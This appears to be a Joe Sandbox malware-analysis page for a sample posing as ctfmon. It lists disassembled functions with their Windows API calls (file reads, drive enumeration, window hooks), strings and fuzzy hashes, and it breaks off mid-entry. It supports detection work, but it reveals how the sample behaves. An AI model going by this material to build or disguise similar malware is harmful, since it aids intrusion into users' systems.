Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd

Similarity

API ID: File$CloseCreateErrorHandleLastType
String ID:
API String ID: 1809617866-0
Opcode ID: 5d4f7fbcfd004d5c716192fc4465a7fbf99ed0a53b8472f6d4e6057b13717365
Instruction ID: aab0d4c648b5e97227a39ec10cf2ade21aae79614a35b9dda5638ec353018830
Opcode Fuzzy Hash: 5d4f7fbcfd004d5c716192fc4465a7fbf99ed0a53b8472f6d4e6057b13717365
Instruction Fuzzy Hash: 598149B1918A45DBEF204B68CC847EF7B60AF81364F24422BE561A73D1C7BC49C5875E

Function 00412AE6 Relevance: 6.2, APIs: 4, Instructions: 170fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000100,00000000,00000000), ref: 00412B60
GetLastError.KERNEL32 ref: 00412B6A
ReadFile.KERNEL32(?,?,00000001,00000000,00000000), ref: 00412C30
GetLastError.KERNEL32 ref: 00412C3A

Memory Dump Source

Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd

Similarity

API ID: ErrorFileLastRead
String ID:
API String ID: 1948546556-0
Opcode ID: 6a45bc645ff46dfccc6dce71b6c10d23138b9b5d02a2b2b171ab11cb0922ce5a
Instruction ID: 7d164bf494c3a70b5ac177ea6f34f1a928856a788b915d1263595a35fc0a8096
Opcode Fuzzy Hash: 6a45bc645ff46dfccc6dce71b6c10d23138b9b5d02a2b2b171ab11cb0922ce5a
Instruction Fuzzy Hash: 3551E7346043859FDF218F98C9807EE7BB0AF12304F54409BE951DB351E3B899E6CB99

Function 00411C97 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 103COMMON

Download Yara Rule

APIs

Part of subcall function 0041257D: InitializeCriticalSection.KERNEL32(00000000,00000000,?,?,0041400E,00000009,00000000,00000000,00000001,00410234,00000001,00000074,?,?,00000000,00000001), ref: 004125BA
Part of subcall function 0041257D: EnterCriticalSection.KERNEL32(?,?,?,0041400E,00000009,00000000,00000000,00000001,00410234,00000001,00000074,?,?,00000000,00000001), ref: 004125D5

InitializeCriticalSection.KERNEL32(00000068,00000100,00000080,?,00000000,00000000,00000000,00415A65,00000001,00000000,00000000), ref: 00411CEA
EnterCriticalSection.KERNEL32(00000068,00000100,00000080,?,00000000,00000000,00000000,00415A65,00000001,00000000,00000000), ref: 00411CFF
LeaveCriticalSection.KERNEL32(00000068,?,00000000,00000000,00000000,00415A65,00000001,00000000,00000000), ref: 00411D0C

Strings

, xrefs: 00411D40

Memory Dump Source

Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd

Similarity

API ID: CriticalSection$EnterInitialize$Leave
String ID:
API String ID: 713024617-3916222277
Opcode ID: 1dc31ab478f0914f8f2649b55863778f4ed1d95d0d2dde45da4442d96100c209
Instruction ID: 13a2c4bc58f2d481d2e4a9d701e6eaf19ac6520ffe26352c078445bd6550f82f
Opcode Fuzzy Hash: 1dc31ab478f0914f8f2649b55863778f4ed1d95d0d2dde45da4442d96100c209
Instruction Fuzzy Hash: BF3139725053019FD3148F20ECC47EA77E5EB41338F248A2EE6668B2E1D7B4A8C88759

Function 00428FD4 Relevance: 6.1, APIs: 4, Instructions: 63COMMON

Download Yara Rule

APIs

GetVersion.KERNEL32(?,?,?,00428FCF), ref: 0042904B
GetProcessVersion.KERNEL32(00000000,?,?,?,00428FCF), ref: 00429088
LoadCursorW.USER32(00000000,00007F02), ref: 004290B6
LoadCursorW.USER32(00000000,00007F00), ref: 004290C1

Memory Dump Source

Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd

Similarity

API ID: CursorLoadVersion$Process
String ID:
API String ID: 2246821583-0
Opcode ID: 1bbe7f5c98f481103e0da3ba9a6ba3310e5f518a3410d3f196074bbe7f85877f
Instruction ID: f2f89bb0e4747260c37c204fa35bc9d0ef2f952a0fe52942db453467d738cb5e
Opcode Fuzzy Hash: 1bbe7f5c98f481103e0da3ba9a6ba3310e5f518a3410d3f196074bbe7f85877f
Instruction Fuzzy Hash: 33113DB1A107608FD7249F7A988452ABBE5FB487047804D3FE18BC6B51DB78E4418F54

Function 00411AB2 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 52COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(00000000,00000100,K[A,00411A8A,K[A,K[A,00000100,00000000,00415B4B,00000000), ref: 00411AEC
GetLastError.KERNEL32 ref: 00411AF6

Strings

K[A, xrefs: 00411AB2
K[A, xrefs: 00411AB3, 00411AB8, 00411AE4, 00411B02

Memory Dump Source

Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd

Similarity

API ID: CloseErrorHandleLast
String ID: K[A$K[A
API String ID: 918212764-3551647969
Opcode ID: 89eb0f5452d5d8246573299db4c61837e9694d72ece4d1da2cd1643f1eff998d
Instruction ID: 6524854afac2a70c962223058db7ab38a219dab8095493e29c0a91285f7820d6
Opcode Fuzzy Hash: 89eb0f5452d5d8246573299db4c61837e9694d72ece4d1da2cd1643f1eff998d
Instruction Fuzzy Hash: 8101A73361962056C62467B96C49EEB16644FC1375F25061FFB11D62F1EE2CA8C2815D

Function 00403D20 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMON

Download Yara Rule

APIs

GetLogicalDrives.KERNEL32 ref: 00403D25
GetDriveTypeA.KERNEL32(?), ref: 00403D7E

Strings

%c:\, xrefs: 00403D67

Memory Dump Source

Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd

Similarity

API ID: DriveDrivesLogicalType
String ID: %c:\
API String ID: 4038169723-3142399695
Opcode ID: 9dc73e3006044a7526e050ae8973abdfa3826bae856626810e2cb37736896c5e
Instruction ID: 5a5b2ba27494c355ef28315322f719edc421758644ed9a5ba6575820666cadf4
Opcode Fuzzy Hash: 9dc73e3006044a7526e050ae8973abdfa3826bae856626810e2cb37736896c5e
Instruction Fuzzy Hash: A701A7629406009AC3119B08E89175BBFD99BE4311F54853FE88467380D67B994A87A9

Function 00403C80 Relevance: 4.5, APIs: 1, Strings: 2, Instructions: 42sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00001388), ref: 00403C91

Part of subcall function 00403D20: GetLogicalDrives.KERNEL32 ref: 00403D25
Part of subcall function 00403D20: GetDriveTypeA.KERNEL32(?), ref: 00403D7E

Strings

+*&=^^^^--------DRIVE, xrefs: 00403CC8
I, xrefs: 00403CFD

Memory Dump Source

Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd

Similarity

API ID: DriveDrivesLogicalSleepType
String ID: +*&=^^^^--------DRIVE$I
API String ID: 998507393-3356893098
Opcode ID: 6404bc3285479118a6d9aa39b9ca3365bf84b49e5fd7b4dc3ec66ac132270eda
Instruction ID: 49d0c6ced368fd66185a0629946516c02ffbc5c9166c48d24d2764af2432aa93
Opcode Fuzzy Hash: 6404bc3285479118a6d9aa39b9ca3365bf84b49e5fd7b4dc3ec66ac132270eda
Instruction Fuzzy Hash: 1A015E325043049BE700DF60D85165BBFE2AB98710F80483EF95A7B3C0DA769E09DB9A

Function 0042187E Relevance: 4.5, APIs: 3, Instructions: 34COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,?), ref: 00421887
SetWindowLongW.USER32(?,?,00408812), ref: 004218A6
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,?,?,004218FE,00408812,000000EC,?,?,?,00408812,?), ref: 004218C0

Memory Dump Source

Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd

Similarity

API ID: Window$Long
String ID:
API String ID: 847901565-0
Opcode ID: 3ee0e841910f72ad038163963a675ad57a9dba422b27fd7ec58bc383047907e9
Instruction ID: 46a18c6c3a5692cf3f7d8173769a82117a3993c78e402f77b7694b3d22f29e20
Opcode Fuzzy Hash: 3ee0e841910f72ad038163963a675ad57a9dba422b27fd7ec58bc383047907e9
Instruction Fuzzy Hash: 48F01C35210019BFDF18AF50EC959BF3B65EF14351B90842AF906C5170D731A962AAA8

Function 00420932 Relevance: 4.5, APIs: 3, Instructions: 29windowCOMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(?,00000000,00000000,00000000), ref: 0042093F
TranslateMessage.USER32(?), ref: 0042095F
DispatchMessageW.USER32(?), ref: 00420966

Memory Dump Source

Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd

Similarity

API ID: Message$CallbackDispatchDispatcherTranslateUser
String ID:
API String ID: 2960505505-0
Opcode ID: b3613d69d856413218d6d1271ffd960b09534bfebe9e9f37242a4a3cb32dcde9
Instruction ID: fabc7a01dc3d71df9f254138b74deb61d15ffc8e1f8f1f232a1b835c48f4a5e8
Opcode Fuzzy Hash: b3613d69d856413218d6d1271ffd960b09534bfebe9e9f37242a4a3cb32dcde9
Instruction Fuzzy Hash: F6E092723005106FE3316B28AC98E7F37ECEF85B01784042EF402D2112CB649C82CA7A

Function 00421924 Relevance: 3.0, APIs: 2, Instructions: 44COMMON

Download Yara Rule

APIs

Part of subcall function 00424202: GetWindowLongW.USER32(?,000000F0), ref: 0042420E

GetWindowRect.USER32(?,00421B1C), ref: 00421949
GetWindow.USER32(?,00000004), ref: 00421966

Part of subcall function 0042438F: IsWindowEnabled.USER32(?), ref: 00424399

Memory Dump Source

Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd

Similarity

API ID: Window$EnabledLongRect
String ID:
API String ID: 3170195891-0
Opcode ID: effe7db21416aec86d5d1406498b371649853bace2238ba7ed55f32c8f800dca
Instruction ID: 3d44051e79cfe25b8d70dd5f5f519bbb07aa03c4fe1e1fb717501b8327a53114
Opcode Fuzzy Hash: effe7db21416aec86d5d1406498b371649853bace2238ba7ed55f32c8f800dca
Instruction Fuzzy Hash: 39015E707002289BDB21AB25E865B7E77A9AF61714F80486EED42973A1D738ED80C65C

Function 00412848 Relevance: 3.0, APIs: 2, Instructions: 41COMMON

Download Yara Rule

APIs

SetFilePointer.KERNEL32(00000000,0053CB6B,00000000,00000000,00000000,0053CB6B,004126A5,0053CB6B,00000000,00000002,00000001,0053CB6B,?), ref: 00412872
GetLastError.KERNEL32 ref: 0041287F

Memory Dump Source

Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: 2bd6f2df571c30d8d268d01624ed3f6f81c3a9a6c1b2a642c7a8942a74d1f768
Instruction ID: 10e19110f1e5badc9e720bb41e1b460c98416622eb2bcf91d42185f1d58b7cbf
Opcode Fuzzy Hash: 2bd6f2df571c30d8d268d01624ed3f6f81c3a9a6c1b2a642c7a8942a74d1f768
Instruction Fuzzy Hash: E0F02D3661421157CA247B78AC085DA37649F85334F21077BF531D72E1DF78C8A68359

Function 004291C6 Relevance: 3.0, APIs: 2, Instructions: 32COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000000,00000000,0042603E,00000000,00000000,00000000,00000000,?,00000000,?,0041F96C,00000000,00000000,00000000,00000000,0040D108), ref: 004291CF
SetErrorMode.KERNEL32(00000000,?,00000000,?,0041F96C,00000000,00000000,00000000,00000000,0040D108,00000000), ref: 004291D6

Part of subcall function 00429229: GetModuleFileNameW.KERNEL32(00000000,?,00000104,?,?), ref: 0042925A
Part of subcall function 00429229: lstrcpyW.KERNEL32(?,.HLP,?,?,00000104), ref: 004292FB
Part of subcall function 00429229: lstrcatW.KERNEL32(?,.INI,?,?,00000104), ref: 0042932A

Memory Dump Source

Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd

Similarity

API ID: ErrorMode$FileModuleNamelstrcatlstrcpy
String ID:
API String ID: 3389432936-0
Opcode ID: f71a52bd6f10f1c5d171d46f7e8e0ad32366ecb0e776d89220ff6f7025bbea85
Instruction ID: 0f0f40c96ee9f28d0d0ec8962dd78e8fd03b51d7b4fb64733512bf25de8db611
Opcode Fuzzy Hash: f71a52bd6f10f1c5d171d46f7e8e0ad32366ecb0e776d89220ff6f7025bbea85
Instruction Fuzzy Hash: 1AF04975A142209FD714EF65E485A0D7BE4AF44B10F45888FF8489B3A2CF78D840CF6A

Function 004103EB Relevance: 3.0, APIs: 2, Instructions: 30memoryCOMMON

Download Yara Rule

APIs

HeapCreate.KERNEL32(00000000,00001000,00000000,0040D087,00000001), ref: 004103FC

Part of subcall function 004102A3: GetVersionExA.KERNEL32 ref: 004102C2

HeapDestroy.KERNEL32 ref: 0041043B

Part of subcall function 00412D44: HeapAlloc.KERNEL32(00000000,00000140,00410424,000003F8), ref: 00412D51

Memory Dump Source

Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd

Similarity

API ID: Heap$AllocCreateDestroyVersion
String ID:
API String ID: 2507506473-0
Opcode ID: dc0e4f96b9bfa2dfd241da328ae4e49f447cbd5b13466095a185e15b9ddf63a4
Instruction ID: 497c8a25df3411b8ffde37235463325da3650acc20757d7ac2592f9ec469bdd4
Opcode Fuzzy Hash: dc0e4f96b9bfa2dfd241da328ae4e49f447cbd5b13466095a185e15b9ddf63a4
Instruction Fuzzy Hash: 00F06530B512119DDB645B70ED877FA2694DB9078EF24442BF684C91E1EBF884C5990A

Function 004203D5 Relevance: 3.0, APIs: 2, Instructions: 27threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 004203E8
SetWindowsHookExW.USER32(000000FF,0042072A,00000000,00000000), ref: 004203F8

Part of subcall function 00428C9A: __EH_prolog.LIBCMT ref: 00428C9F

Memory Dump Source

Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd

Similarity

API ID: CurrentH_prologHookThreadWindows
String ID:
API String ID: 2183259885-0
Opcode ID: 5eaa8821a15602728f6c7bce36cfee05decd38d7f59ae19100c8a9dc53e0b684
Instruction ID: 6bcf5cd4f4f4ddade5c49cae69e891880ade3d052de22ae2a353e1a51ef8f9c9
Opcode Fuzzy Hash: 5eaa8821a15602728f6c7bce36cfee05decd38d7f59ae19100c8a9dc53e0b684
Instruction Fuzzy Hash: 52F08231B02230ABD7203B71B95971D2AD0AF50715F9546AEF502975E2CE288841C76D

Function 00422460 Relevance: 3.0, APIs: 2, Instructions: 27COMMON

Download Yara Rule

APIs

DefWindowProcW.USER32(?,?,?,?), ref: 00422487
CallWindowProcW.USER32(?,?,?,?,?), ref: 0042249C

Memory Dump Source

Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd

Similarity

API ID: ProcWindow$Call
String ID:
API String ID: 2316559721-0
Opcode ID: f688ebd1a0ae5da7d78c7a24aa8a1e7d28b38987f708924316816e99806330b5
Instruction ID: 233a5364c896a44adc16a6cce7b45886d7cf299a5c9d453a734240230d2e1711
Opcode Fuzzy Hash: f688ebd1a0ae5da7d78c7a24aa8a1e7d28b38987f708924316816e99806330b5
Instruction Fuzzy Hash: 78F01C36200215FFCF219F95EC44D9A7BB9FF18360B448529FA4586120D772D920AB44

Function 00422096 Relevance: 3.0, APIs: 2, Instructions: 25threadCOMMON

Download Yara Rule

APIs

Part of subcall function 00428C05: TlsGetValue.KERNEL32(0053F118,?,00000000,004283FD,00427DD6,00428419,004203C5,0042601F,?,00000000,?,0041F96C,00000000,00000000,00000000,00000000), ref: 00428C44

GetCurrentThreadId.KERNEL32 ref: 004220B8
SetWindowsHookExW.USER32(00000005,Function_00021EF2,00000000,00000000), ref: 004220C8

Memory Dump Source

Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd

Similarity

API ID: CurrentHookThreadValueWindows
String ID:
API String ID: 933525246-0
Opcode ID: 2a60e45d90dbc51d8dff187ae436cece9d4aa2d7a8c02c67daea1e4041fd0ec8
Instruction ID: 17601e8b442b9b03c5e5566830a56eca268cea50e62353c77c62ba015712df01
Opcode Fuzzy Hash: 2a60e45d90dbc51d8dff187ae436cece9d4aa2d7a8c02c67daea1e4041fd0ec8
Instruction Fuzzy Hash: F5E0E531301720AFD2305B22AC05B1776E4EF80B11F90452FE205D1140D7B89846CB7D

Function 0040E14A Relevance: 1.6, APIs: 1, Instructions: 80memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,-0000000F,00000000,?,00000000,00000000,00000000), ref: 0040E231

Part of subcall function 0041257D: InitializeCriticalSection.KERNEL32(00000000,00000000,?,?,0041400E,00000009,00000000,00000000,00000001,00410234,00000001,00000074,?,?,00000000,00000001), ref: 004125BA
Part of subcall function 0041257D: EnterCriticalSection.KERNEL32(?,?,?,0041400E,00000009,00000000,00000000,00000001,00410234,00000001,00000074,?,?,00000000,00000001), ref: 004125D5

Memory Dump Source

Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd

Similarity

API ID: CriticalSection$AllocateEnterHeapInitialize
String ID:
API String ID: 1616793339-0
Opcode ID: c2eccd4ad7c7d846102367b4257caf7ecf94ba4f496759abc678b985d4644e17
Instruction ID: 9efc5791e0f1d7c9c186a67d883c5475a9d78367af9f374711ed2f43329d38d0
Opcode Fuzzy Hash: c2eccd4ad7c7d846102367b4257caf7ecf94ba4f496759abc678b985d4644e17
Instruction Fuzzy Hash: B9219A31A40215ABDB109BA6EC42BDE7768EB10724F14496FF410FB2D1C778A9918A98

Function 00421A74 Relevance: 1.6, APIs: 1, Instructions: 73COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00421A79

Part of subcall function 00428C05: TlsGetValue.KERNEL32(0053F118,?,00000000,004283FD,00427DD6,00428419,004203C5,0042601F,?,00000000,?,0041F96C,00000000,00000000,00000000,00000000), ref: 00428C44

Memory Dump Source

